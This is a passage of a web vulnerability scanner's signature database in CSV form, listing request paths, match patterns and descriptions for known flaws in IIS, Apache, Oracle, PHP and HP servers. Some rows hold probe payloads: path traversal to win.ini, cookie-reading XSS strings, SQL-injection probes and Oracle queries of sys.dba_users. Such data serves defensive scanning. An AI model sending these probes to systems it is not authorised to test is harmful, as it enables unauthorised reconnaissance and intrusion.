CVE-2002-0661.\",\"\",\"\"\n\"003382\",\"859\",\"7\",\"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.\",\"\",\"\"\n\"003383\",\"96\",\"7\",\"/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.\",\"\",\"\"\n\"003384\",\"96\",\"7\",\"/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.\",\"\",\"\"\n\"003385\",\"9624\",\"3\",\"/pass_done.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.\",\"\",\"\"\n\"003386\",\"9624\",\"a\",\"/admin/admin.php?adminpy=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PY-Membres 4.2 may allow administrator access.\",\"\",\"\"\n\"003387\",\"0\",\"1\",\"/iishelp/iis/htm/tutorial/redirect.asp\",\"GET\",\"A URL is required\",\"\",\"\",\"\",\"\",\"Possibly unchecked redirect with url= variable.\",\"\",\"\"\n\"003388\",\"9695\",\"3\",\"/servlet/SnoopServlet\",\"GET\",\"Client Information\",\"\",\"\",\"\",\"\",\"JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"003389\",\"3268\",\"2\",\"/Citrix/PNAgent/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003390\",\"3268\",\"2\",\"/Citrix/ICAWEB/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003391\",\"3268\",\"2\",\"/IBMWebAS/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003392\",\"3268\",\"2\",\"/IBMWebAS/docs/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003393\",\"3233\",\"1\",\"/IBMWebAS/apidocs/\",\"GET\",\"IBM WebSphere\",\"\",\"\",\"\",\"\",\"IBM Websphere documentation found.\",\"\",\"\"\n\"003394\",\"3233\",\"1\",\"/IBMWebAS/configDocs/\",\"GET\",\"WebSphere Configuration\",\"\",\"\",\"\",\"\",\"IBM Websphere documentation found.\",\"\",\"\"\n\"003395\",\"3268\",\"2\",\"/IBMWebAS/mbeanDocs/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found. IBM Websphere documentation.\",\"\",\"\"\n\"003396\",\"3092\",\"1\",\"/iishelp/iis/misc/default.asp\",\"GET\",\"Microsoft Internet Information Services\",\"\",\"\",\"\",\"\",\"Default IIS page found.\",\"\",\"\"\n\"003397\",\"3092\",\"1\",\"/Citrix/MetaFrameXP/default/login.asp\",\"GET\",\"MetaFrame XP\",\"\",\"\",\"\",\"\",\"Citrix MetaFrame login.\",\"\",\"\"\n\"003398\",\"3233\",\"1\",\"@TOMCATADMINhtml-manager-howto.html\",\"GET\",\"Application Manager\",\"\",\"\",\"\",\"\",\"Tomcat documentation found.\",\"\",\"\"\n\"003399\",\"3233\",\"1\",\"@TOMCATADMINmanager-howto.html\",\"GET\",\"Manager App\",\"\",\"\",\"\",\"\",\"Tomcat documentation found.\",\"\",\"\"\n\"003400\",\"3233\",\"1\",\"/includes/adovbs.inc\",\"GET\",\"Microsoft ADO\",\"\",\"\",\"\",\"\",\"Default Microsoft file found.\",\"\",\"\"\n\"003401\",\"3233\",\"1\",\"/adovbs.inc\",\"GET\",\"Microsoft ADO\",\"\",\"\",\"\",\"\",\"Microsoft default file found.\",\"\",\"\"\n\"003402\",\"3092\",\"13\",\"/fcgi-bin/echo\",\"GET\",\"FastCGI echo\",\"\",\"\",\"\",\"\",\"The FastCGI echo program may reveal system info or lead to other attacks.\",\"\",\"\"\n\"003403\",\"3092\",\"13\",\"/fcgi-bin/echo2\",\"GET\",\"FastCGI echo\",\"\",\"\",\"\",\"\",\"The FastCGI echo2 program may reveal system info or lead to other attacks.\",\"\",\"\"\n\"003404\",\"3233\",\"1\",\"/pls/ldc/admin_/\",\"GET\",\"Gateway Configuration\",\"\",\"\",\"\",\"\",\"Oracle Gateway Configuration application.\",\"\",\"\"\n\"003405\",\"3233\",\"1\",\"/demo/basic/simple/viewsrc/welcomeuser.jsp.txt\",\"GET\",\"WelcomeUser JSP\",\"\",\"\",\"\",\"\",\"Default demo code found.\",\"\",\"\"\n\"003406\",\"3092\",\"13\",\"/README\",\"GET\",\"OracleJSP\",\"200\",\"\",\"\",\"\",\"README file found.\",\"\",\"\"\n\"003407\",\"3092\",\"13\",\"/demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt\",\"GET\",\"Oracle Corporation\",\"\",\"\",\"\",\"\",\"Default Oracle code found.\",\"\",\"\"\n\"003408\",\"3092\",\"1\",\"/soapdocs/webapps/soap/\",\"GET\",\"Oracle SOAP\",\"\",\"\",\"\",\"\",\"Oracle SOAP application.\",\"\",\"\"\n\"003409\",\"3092\",\"1\",\"/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml\",\"GET\",\"SOAP configuration file\",\"\",\"\",\"\",\"\",\"SOAP server configuration file.\",\"\",\"\"\n\"003410\",\"20954\",\"4\",\"/shopadmin.asp?Password=abc&UserName=\\\"><script>alert(foo)</script>\",\"GET\",\"<script>alert\\(foo\\)<\\/script>\",\"\",\"\",\"\",\"\",\"VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.\",\"\",\"\"\n\"003411\",\"20406\",\"4\",\"/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"PHP contains a flaw that allows a remote cross site scripting attack.\",\"\",\"\"\n\"003412\",\"24484\",\"4\",\"/phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>\",\"GET\",\"<script>alert\\(foo\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS\",\"\",\"\"\n\"003413\",\"3233\",\"1\",\"/j2ee/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"j2ee directory found--possibly an Oracle app server directory.\",\"\",\"\"\n\"003414\",\"3233\",\"3\",\"@CGIDIRSprintenv.tmp\",\"GET\",\"DOCUMENT_ROOT\",\"\",\"\",\"\",\"\",\"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.\",\"\",\"\"\n\"003415\",\"3233\",\"1\",\"/perl/printenv\",\"GET\",\"DOCUMENT_ROOT\",\"\",\"\",\"\",\"\",\"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.\",\"\",\"\"\n\"003416\",\"3233\",\"3\",\"/perl-status\",\"GET\",\"Embedded Perl\",\"\",\"\",\"\",\"\",\"Perl status page found. This may reveal details about the Perl installation and operating system.\",\"\",\"\"\n\"003417\",\"3233\",\"13\",\"/WebCacheDemo.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle WebCache Demo\",\"\",\"\"\n\"003418\",\"32333\",\"13\",\"/webcache/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle WebCache Demo\",\"\",\"\"\n\"003419\",\"3233\",\"13\",\"/webcache/webcache.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle WebCache Demo\",\"\",\"\"\n\"003420\",\"3233\",\"13\",\"/bmp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SQLJ Demo Application\",\"\",\"\"\n\"003421\",\"3233\",\"13\",\"/bmp/global-web-application.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SQLJ Demo Application\",\"\",\"\"\n\"003422\",\"3233\",\"13\",\"/bmp/JSPClient.java\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SQLJ Demo Application\",\"\",\"\"\n\"003423\",\"3233\",\"13\",\"/bmp/mime.types\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SQLJ Demo Application\",\"\",\"\"\n\"003424\",\"3233\",\"13\",\"/bmp/README.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SQLJ Demo Application\",\"\",\"\"\n\"003425\",\"3233\",\"13\",\"/bmp/sqljdemo.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SQLJ Demo Application\",\"\",\"\"\n\"003426\",\"3233\",\"13\",\"/bmp/setconn.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SQLJ Demo Application\",\"\",\"\"\n\"003427\",\"3233\",\"13\",\"/ptg_upgrade_pkg.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle log files.\",\"\",\"\"\n\"003428\",\"3233\",\"13\",\"/OA_HTML/oam/weboam.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle log files.\",\"\",\"\"\n\"003429\",\"3233\",\"1\",\"/webapp/admin/_pages/_bc4jadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle JSP files\",\"\",\"\"\n\"003430\",\"3233\",\"1\",\"/_pages/_webapp/_admin/_showpooldetails.java\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle JSP files\",\"\",\"\"\n\"003431\",\"3233\",\"1\",\"/_pages/_webapp/_admin/_showjavartdetails.java\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle JSP file\",\"\",\"\"\n\"003432\",\"3233\",\"1\",\"/_pages/_demo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle JSP file\",\"\",\"\"\n\"003433\",\"3233\",\"1\",\"/_pages/_webapp/_jsp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle JSP file.\",\"\",\"\"\n\"003434\",\"3233\",\"1\",\"/_pages/_demo/_sql/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle JSP file.\",\"\",\"\"\n\"003435\",\"3233\",\"13\",\"/OA_HTML/_pages/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle JSP file.\",\"\",\"\"\n\"003436\",\"3233\",\"13\",\"/OA_HTML/webtools/doc/index.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Cabo DHTML Components Help Page\",\"\",\"\"\n\"003437\",\"18114\",\"8\",\"/reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\" Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution\",\"\",\"\"\n\"003438\",\"3233\",\"1\",\"/apex/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Application Express login screen.\",\"\",\"\"\n\"003439\",\"3233\",\"1b\",\"/OA_JAVA/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications Portal Page\",\"\",\"\"\n\"003440\",\"3233\",\"1b\",\"/OA_HTML/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications Portal Page\",\"\",\"\"\n\"003441\",\"3233\",\"1b\",\"/aplogon.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications Portal Page\",\"\",\"\"\n\"003442\",\"3233\",\"1b\",\"/appdet.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications Portal Pages\",\"\",\"\"\n\"003443\",\"3233\",\"1b\",\"/servlets/weboam/oam/oamLogin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Application Manager\",\"\",\"\"\n\"003444\",\"3233\",\"1b\",\"/OA_HTML/PTB/mwa_readme.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Mobile Applications Industrial Server administration and configuration interface\",\"\",\"\"\n\"003445\",\"3233\",\"1b\",\"/reports/rwservlet\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Reports\",\"\",\"\"\n\"003446\",\"3233\",\"1b\",\"/reports/rwservlet/showenv\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Reports\",\"\",\"\"\n\"003447\",\"3233\",\"1b\",\"/reports/rwservlet/showmap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Reports\",\"\",\"\"\n\"003448\",\"3233\",\"1b\",\"/reports/rwservlet/showjobs\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Reports\",\"\",\"\"\n\"003449\",\"3233\",\"1b\",\"/reports/rwservlet/getjobid7?server=myrep\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Reports\",\"\",\"\"\n\"003450\",\"3233\",\"1b\",\"/reports/rwservlet/getjobid4?server=myrep\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Reports\",\"\",\"\"\n\"003451\",\"3233\",\"1b\",\"/reports/rwservlet/showmap?server=myserver\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Reports\",\"\",\"\"\n\"003452\",\"3093\",\"1a\",\"/pls/portal/owa_util.cellsprint?p_theQuery=select\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Direct access to Oracle packages could have an unknown impact.\",\"\",\"\"\n\"003453\",\"3093\",\"1a\",\"/pls/portal/owa_util.listprint?p_theQuery=select\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003454\",\"3093\",\"1a\",\"/pls/portal/owa_util.show_query_columns?ctable=sys.dba_users\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003455\",\"3093\",\"1a\",\"/pls/portal/owa_util.showsource?cname=owa_util\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003456\",\"3093\",\"1a\",\"/pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003457\",\"3093\",\"1a\",\"/pls/portal/owa_util.signature\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003458\",\"3093\",\"1a\",\"/pls/portal/HTP.PRINT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003459\",\"3093\",\"1a\",\"/pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003460\",\"3093\",\"1a\",\"/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003461\",\"3093\",\"1a\",\"/pls/portal/PORTAL.wwv_form.genpopuplist\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages cold have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003462\",\"3093\",\"1a\",\"/pls/portal/PORTAL.wwv_ui_lovf.show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003464\",\"3093\",\"1a\",\"/pls/portal/PORTAL.wwv_dynxml_generator.show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003465\",\"3093\",\"1a\",\"/pls/portal/PORTAL.home\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003467\",\"3093\",\"1a\",\"/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003468\",\"3093\",\"1a\",\"/pls/portal/SELECT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003469\",\"3093\",\"1a\",\"/pls/portal/null\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Access to Oracle pages could have an unknown impact.\t\t\t\t\t\",\"\",\"\"\n\"003470\",\"3093\",\"1b\",\"/OA_MEDIA/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003471\",\"3093\",\"1b\",\"/OA_HTML/META-INF/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003472\",\"3093\",\"1b\",\"/OA_HTML/jsp/por/services/login.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003473\",\"3093\",\"1b\",\"/OA_HTML/PTB/ICXINDEXBASECASE.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003474\",\"3093\",\"1b\",\"/OA_HTML/PTB/ECXOTAPing.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003475\",\"3093\",\"1b\",\"/OA_HTML/PTB/xml_sample1.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003476\",\"3093\",\"1b\",\"/OA_HTML/jsp/wf/WFReassign.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003477\",\"3093\",\"1b\",\"/OA_JAVA/Oracle/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003478\",\"3093\",\"1b\",\"/OA_JAVA/servlet.zip\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003479\",\"3093\",\"1b\",\"/OA_JAVA/oracle/forms/registry/Registry.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003480\",\"3093\",\"1b\",\"/OA_HTML/oam/\",\"GET\",\"Oracle Access Manager\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003481\",\"3233\",\"1b\",\"/OA_HTML/jsp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications portal page found\",\"\",\"\"\n\"003482\",\"3233\",\"1b\",\"/OA_HTML/jsp/fnd/fndversion.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications help page found.\",\"\",\"\"\n\"003483\",\"3233\",\"1b\",\"/OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications help page found.\t\t\t\t\t\",\"\",\"\"\n\"003484\",\"3233\",\"1b\",\"/OA_HTML/jsp/fnd/fndhelputil.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle Applications help page found.\",\"\",\"\"\n\"003485\",\"3092\",\"1\",\"/install/install.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Install file found.\",\"\",\"\"\n\"003486\",\"67\",\"3\",\"/_vti_bin/shtml.dll/_vti_rpc\",\"POST\",\"The user\",\"\",\"\",\"\",\"\",\"The anonymous FrontPage user is revealed through a crafted POST.\",\"method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f\",\"\"\n\"003487\",\"3092\",\"3\",\"/cehttp/trace\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sterling Commerce Connect Direct trace log file may contain user ID information.\",\"\",\"\"\n\"003488\",\"3092\",\"3\",\"/cehttp/property/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sterling Commerce Connect Direct configuration files.\",\"\",\"\"\n\"003489\",\"3092\",\"b\",\"/webdav/index.html\",\"GET\",\"WebDAV support\",\"\",\"\",\"\",\"\",\"WebDAV support is enabled.\",\"\",\"\"\n\"003490\",\"3268\",\"2\",\"/hp-ux/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003491\",\"3092\",\"13b\",\"/hp_docs/\",\"GET\",\"web server suite\",\"\",\"\",\"\",\"\",\"HP-UX Web Server Suite was found.\",\"\",\"\"\n\"003492\",\"3092\",\"13b\",\"/hp_docs/cgi-bin/index.cgi\",\"GET\",\"web server suite\",\"\",\"\",\"\",\"\",\"HP-UX Web Server Suite was found.\",\"\",\"\"\n\"003493\",\"3268\",\"2\",\"/hp_docs/xmltools/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found. HP-UX Web Server Suite xml tools.\",\"\",\"\"\n\"003494\",\"3092\",\"3\",\"@CGIDIRSshowuser.cgi\",\"GET\",\"Username\",\"\",\"\",\"\",\"\",\"Shows the output of the 'whoami' command, which shows the web server user.\",\"\",\"\"\n\"003495\",\"3092\",\"1\",\"@CGIDIRSman2html\",\"GET\",\"manual page\",\"\",\"\",\"\",\"\",\"Gateway to Unix man pages.\",\"\",\"\"\n\"003496\",\"3092\",\"3\",\"/status?full=true\",\"GET\",\"Tomcat Status\",\"\",\"\",\"\",\"\",\"Apache Tomcat and/or JBoss information page.\",\"\",\"\"\n\"003497\",\"35935\",\"4\",\"/rpc.php?q=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.\",\"\",\"\"\n\"003499\",\"35933\",\"9\",\"/db.php?q='&t='\",\"GET\",\"MySQL server version\",\"\",\"\",\"\",\"\",\"Unobtrusive Ajax Star Rating Bar db.php is vulnerable to SQL injection in the q and t variables.\",\"\",\"\"\n\"003500\",\"35934\",\"9\",\"/rpc.php?q='&t='\",\"GET\",\"MySQL server version\",\"\",\"\",\"\",\"\",\"Unobtrusive Ajax Star Rating Bar rpc.php is vulnerable to SQL injection in the q and t variables.\",\"\",\"\"\n\"003501\",\"3233\",\"b\",\"/junk.cfm\",\"GET\",\"BlueDragon Time\",\"\",\"\",\"\",\"\",\"Server is running BlueDragon from New Atlanta for CFML processing.\",\"\",\"\"\n\"003502\",\"3233\",\"1\",\"/jsp-examples/\",\"GET\",\"Java Server Pages\",\"\",\"\",\"\",\"\",\"Apache Java Server Pages documentation.\",\"\",\"\"\n\"003503\",\"3233\",\"b\",\"/nps/iManager.html\",\"GET\",\"Novell,\\sInc\",\"\",\"\",\"\",\"\",\"Novell iManager found.\",\"\",\"\"\n\"003504\",\"3233\",\"3b\",\"/nps/version.jsp\",\"GET\",\"Novell,\\sInc\",\"\",\"\",\"\",\"\",\"Novell iManager version found.\",\"\",\"\"\n\"003505\",\"3233\",\"3b\",\"/nps/servlet/webacc?taskId=dev.Empty&merge=fw.About\",\"GET\",\"Novell,\\sInc\",\"\",\"\",\"\",\"\",\"Novell iManager version found.\",\"\",\"\"\n\"003506\",\"3268\",\"2\",\"/doc/Judy/demo/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found. HP Judy language demos.\",\"\",\"\"\n\"003508\",\"3268\",\"2\",\"/doc/vxvm/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found. HP help documentation.\",\"\",\"\"\n\"003509\",\"3233\",\"2\",\"/doc/PRINTER-JPN-S\",\"GET\",\"HPDPS\",\"\",\"\",\"\",\"\",\"HP DPS\",\"\",\"\"\n\"003510\",\"3233\",\"2\",\"/doc/PRINTER-JPN-E\",\"GET\",\"HPDPS\",\"\",\"\",\"\",\"\",\"HP DPS\",\"\",\"\"\n\"003511\",\"3233\",\"2\",\"/doc/NTP_Primer.txt\",\"GET\",\"Network Time\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003512\",\"3233\",\"2\",\"/doc/LICENSE.SMAIL893\",\"GET\",\"license terms\",\"\",\"\",\"\",\"\",\"HP server license document.\",\"\",\"\"\n\"003513\",\"3233\",\"2\",\"/doc/PRINT-ASE-NOTE\",\"GET\",\"Obsolescence\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003514\",\"3233\",\"2\",\"/doc/SETNETLP_Guide-E\",\"GET\",\"Configurable Parameters\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003515\",\"3233\",\"2\",\"/doc/SETNETLP_Guide-S\",\"GET\",\"Configurable Parameters\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003516\",\"3233\",\"2\",\"/doc/dir.perm.txt\",\"GET\",\"part of this patch\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003517\",\"3233\",\"2\",\"/doc/ASX-UTF8\",\"GET\",\"Asian System\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003518\",\"3233\",\"2\",\"/doc/ASX-TCH\",\"GET\",\"Release Note\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003519\",\"3233\",\"2\",\"/doc/ASX-SCH\",\"GET\",\"Release Note\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003520\",\"3233\",\"2\",\"/doc/ASX-KOR\",\"GET\",\"Release Note\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003521\",\"3233\",\"2\",\"/doc/ASX-JPN-S\",\"GET\",\"Asian-Core\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003522\",\"3233\",\"2\",\"/doc/ASX-JPN-E\",\"GET\",\"Asian-Core\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003523\",\"3233\",\"2\",\"/doc/ASX-JPN\",\"GET\",\"Release Note\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003524\",\"3233\",\"2\",\"/doc/11iSRB.txt\",\"GET\",\"Release Bulletin\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003525\",\"3233\",\"2\",\"/doc/11iRelNotes.txt\",\"GET\",\"Release Notes\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003526\",\"3233\",\"2\",\"/doc/11iRelNotes.html\",\"GET\",\"Release Notes\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003527\",\"3233\",\"2\",\"/doc/11.00RelNotes\",\"GET\",\"Release Notes\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003528\",\"3268\",\"2\",\"/doc/Judy/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found. HP server Judy documentation.\",\"\",\"\"\n\"003529\",\"3268\",\"2\",\"/doc/TechPrtServ/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found. HP Documentation.\",\"\",\"\"\n\"003530\",\"3233\",\"2\",\"/doc/sw_patches.txt\",\"GET\",\"HP 9000 Series\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003531\",\"3233\",\"2\",\"/doc/Judy/COPYRIGHT\",\"GET\",\"Trademark Notice\",\"\",\"\",\"\",\"\",\"HP server documentation.\",\"\",\"\"\n\"003532\",\"3233\",\"2\",\"/doc/Judy/Judy1_3x.htm\",\"GET\",\"Judy1 macros\",\"\",\"\",\"\",\"\",\"HP server Judy documentation.\",\"\",\"\"\n\"003533\",\"3233\",\"2\",\"/doc/Judy/Judy1_funcs_3x.htm\",\"GET\",\"Judy1 functions\",\"\",\"\",\"\",\"\",\"HP server Judy 